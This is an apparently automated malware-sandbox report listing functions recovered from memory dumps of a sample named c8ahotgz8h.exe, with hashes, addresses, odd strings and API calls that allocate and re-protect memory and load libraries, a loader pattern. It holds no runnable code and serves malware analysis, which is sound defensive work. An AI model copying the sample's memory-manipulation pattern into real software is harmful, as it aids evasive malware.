Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: d7ed090f3b89347d559488d892903409a0cf83add06a1203499ca25788f30db6
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: CD51907660076ADFCF345E294E683DA33B7EFA13A0FDA402ACC4997501C7744A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023323E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,023315C1,12BC0BD0,0232A728), ref: 023324F5

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: bf3b49c468ab4515d5eefb8f45521d9ee39f12cbd0b830d06bfa1a1553660622
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: D1017CB46043A98FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0232BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 2a8adc6f0b03fac218770f70367ab622f4323f77cfcf711a164981aeb45cd085
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: 9A417A3520436A9FCB309E684CF03DB237A9F957B0F90032BCC699B682D735894D8652

Uniqueness

Uniqueness Score: -1.00%

Function 0232BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 5568af9f5d1b88a803ff720ee625d6d245843792a2f68291c87df0df6bbba138
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: F53167756043799BCF302F2458A03DA636EAF85BA0FA1051BDC469BA41D7718D888A52

Uniqueness

Uniqueness Score: -1.00%

Function 0232C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: d2a707ced68c1cd97293cea2e525999db5a24afb1275bfa9084fb6dc7c9c2d32
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: 76318C726003289BCF30AE264D543DE27BBAFD4750FBA8417DC09DB600C771CD4A8A51

Uniqueness

Uniqueness Score: -1.00%

Function 0232F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: a16d496182511e7ef7d2b13895ed3614b12ab76cd99eea5806f39665cefe5d94
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: DC1166716013399BCF30AF2A59A43CA237AAFD8790FA5801BDC49DB600C7718D498B91

Uniqueness

Uniqueness Score: -1.00%

Function 02323800, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE ref: 0232C1BE

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction ID: 5e6b93bef45e803cbc102de45c63aeb1c1276c1e8cbf2317a215830dd3d74df8
Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction Fuzzy Hash: 3101763559836ACBCB18AE3085823EDB7A0EF51360F96555CCCD257402D32540CECF03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: c8ahotgz8h.exe PID: 5908 Parent PID: 5500 c8ahotgz8h.exeCOMMON

Executed Functions

Function 00570754, Relevance: 13.7, APIs: 1, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

U=b, xrefs: 0056B67C
H+m, xrefs: 0056A66D
}#c, xrefs: 0056A819
Sm!|, xrefs: 00570800
yW^g, xrefs: 00570D53
yW^g, xrefs: 00570D58

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
Instruction ID: d0a24021aa5a83e410dc14346b831975518b4d005ce0386654d94a0d83295bd7
Opcode Fuzzy Hash: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
Instruction Fuzzy Hash: 77B2357160434ADFDF349E38C9A57EA3BA2FF55390F95812EDC8A9B244D3348985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005706A2, Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=b, xrefs: 0056B67C
H+m, xrefs: 0056A66D
}#c, xrefs: 0056A819
EK], xrefs: 00561450
";Jm, xrefs: 0056BD2A

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
Instruction ID: de7bc562adc1e8c29e232d2a8b7260b26451281c24de198095c5d92c0124658d
Opcode Fuzzy Hash: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
Instruction Fuzzy Hash: 20A2447160434A9FDF349E38CDA57DA7BA2FF55350F59822EDC8A8B250D3358986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0056CE0C, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=b, xrefs: 0056B67C
H+m, xrefs: 0056A66D
}#c, xrefs: 0056A819
EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
Instruction ID: 2cbbea7bca7ffd11db10f875e6770a580d11d4af5b5b0b0b4772a5f387146c35
Opcode Fuzzy Hash: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
Instruction Fuzzy Hash: 60C2357160434A9FDF349E34CDA57EE3BA2FF55390F95852ADC8A9B254D3308986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00572AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305COMMON

Download Yara Rule

Strings

);J, xrefs: 00572D08
EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: 3f7655a3a4547983acea0519667cdc86175e01c8c82dee460008b03e70238bcf
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: DAB17C30A04349CFDF389E34D9A47EA3BA2FF55350F59851ACC8E8B655D7318A82EB01

Uniqueness

Uniqueness Score: -1.00%

Function 0056C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0056CBC8
LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Strings

U=b, xrefs: 0056B67C

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 3ef18e08b5a3f845fcd61d351520893dd6cedf6b16431fadf5f561777080bf1f
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: 45814B71A0035BDFDF349E689DA43EA3AB2BF95390F94413ADC899B254D7318E81CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00571161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: 7f2c824bc979e4107e2b7bf8adf9b110f1ab5535bc9a2088fec85385654fbe56
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: AE61AC71A003499FDF359E7489A43DB3BA6FF963A0F65492ADC46CB701D7318986C701

Uniqueness

Uniqueness Score: -1.00%

Function 0056FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 005701E0

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: f0051739ee9f5ead7fa6c460bb19291342acc587674e0e2bcc116909637407d5
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: ED516B76A0035ADBCF345E299E683DA37A2FFE13A0FDA402ACC4E97201C7304985D741

Uniqueness

Uniqueness Score: -1.00%

Function 00563CE1, Relevance: 1.6, APIs: 1, Instructions: 138
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00563DAF

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
Instruction ID: 815a7e42fffba584ecc8aa1ab58a73cedfe24da399ac82aa319bdbcc8ef843ff
Opcode Fuzzy Hash: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
Instruction Fuzzy Hash: 8041CC715083828FDB159E3489683EA3FD5AF613A0F694B6EC866CB5D2C7368903C701

Uniqueness

Uniqueness Score: -1.00%

Function 00563E0E, Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00563DAF

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
Instruction ID: 23d7aa219f351d074db8552830d230c8a808649600816b93fb4f1542e1a3ca84
Opcode Fuzzy Hash: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
Instruction Fuzzy Hash: 7811C5620187825ED725ED3445683E66FC65F62360F598B4ECCA59B8D2C63785438101

Uniqueness

Uniqueness Score: -1.00%

Function 005723E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,005715C1,12BC0BD0,0056A728), ref: 005724F5

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: 7bec9491bcebd8e26602e5db64857fecd65b64fe27260b38cb10d9b195377669
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: 790171746043558FDF30CE68C8D87DA7695FB8D700F81412AAD4D5B305C6715E89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32DCA

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
Instruction ID: d1a63a4ca8cf21e01ce5e6a3a8e63db0b62585849bbdf859f1ae7fa51080ded6
Opcode Fuzzy Hash: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
Instruction Fuzzy Hash: D790027120140402D7407959550474A40054BD0741FA5C515B5054514EC6698DD5B669

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32D1A

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
Instruction ID: 6528c96b80e366bfd9460b71e1072a89105fc5dd7af34d20e511e39d3bb6d870
Opcode Fuzzy Hash: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
Instruction Fuzzy Hash: 1990023120140413D7117959560470B40094BD0681FE5C916B0414518DD6668952F125

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B90, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B9A

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
Instruction ID: cf46642fe4777423fd7aafb97d7665a467a0ac5905cedfa9f18c9101c3727479
Opcode Fuzzy Hash: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
Instruction Fuzzy Hash: FF90023120148802D7107959950474E40054BD0741FA9C915B4414618DC6A58891B125

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B10, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B1A

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
Instruction ID: 5ea7dda7bf9e6200b6e0e02bb769a152c47f659473f90a78cc525dfaedd269ee
Opcode Fuzzy Hash: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
Instruction Fuzzy Hash: 8D90023120140802D7807959550464E40054BD1741FE5C519B0015614DCA258A59B7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1EA334E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA334EA

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f40ea8f2dbb7950573ab5a8f29ccc9d65ce47197af82d4132493a3d6e7221373
Instruction ID: 0eca4b3383abac04f1b2dbff8fa2e6bf6d4acbdd754aca79ae560a04c27f667a
Opcode Fuzzy Hash: f40ea8f2dbb7950573ab5a8f29ccc9d65ce47197af82d4132493a3d6e7221373
Instruction Fuzzy Hash: 2C90023160550402D7007959561470A50054BD0641FB5C915B0414528DC7A58951B5A6

Uniqueness

Uniqueness Score: -1.00%

Function 0056BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 28afd958650d09b80608952a58c141fa42a07a02f2b2a8f8e81f643da00c4e30
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: 8641773560531A9FCF309E285CE53DB2B61BFA53B0FA0072BDC56DB191DB318D458602

Uniqueness

Uniqueness Score: -1.00%

Function 0056BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 0327d574dbc4f0800ebe1b61ab5bdd207f1a4cf2d3da7fc7c8c06abba19ec839
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: F4319B75A0035ADBDF302F245CA43EE2B6ABF947A0F61052FEC469B241D7318D808742

Uniqueness

Uniqueness Score: -1.00%

Function 0056C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: 49f2a915e24d8e0c3b808ffb7c77f2a8db2218cc0f56602be14b26dd76b22581
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: 26319B72A003099BCF30AE2958583DE2B77BFE43A0FBA8427EC49DB201C7318D468751

Uniqueness

Uniqueness Score: -1.00%

Function 0056F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: 6c20cb82a3ff77e6cd48d1178652c92269bc3356b48ccfc60a8d6d5ff6766eed
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: 55116B71A0132A9BCF306F2969A83CB2776BFD8790FA5442BEC4ADB201DB718D418751

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B2A, Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B44

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
Instruction ID: 18ef1af86ee5b66950ad55bbcb9853c89887fa815b40a290894ea05da423a84c
Opcode Fuzzy Hash: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
Instruction Fuzzy Hash: F3B09B719014C5C5D711EF60570870B79056BD0B41F75C555F2460641E4738C491F179

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1EA9FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9FE28

Strings

HEAP[%wZ]: , xrefs: 1EA9FF19, 1EAA0028, 1EAA0150, 1EAA01F5, 1EAA024C
HEAP: , xrefs: 1EA9FF26, 1EAA0035, 1EAA015D, 1EAA0202, 1EAA0259
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EAA0053
RtlReAllocateHeap, xrefs: 1EA9FE3F, 1EA9FEE2
Just reallocated block at %p to %Ix bytes, xrefs: 1EAA0171
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EAA021F
About to reallocate block at %p to %Ix bytes, xrefs: 1EA9FF3A
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EAA026A

Memory Dump Source

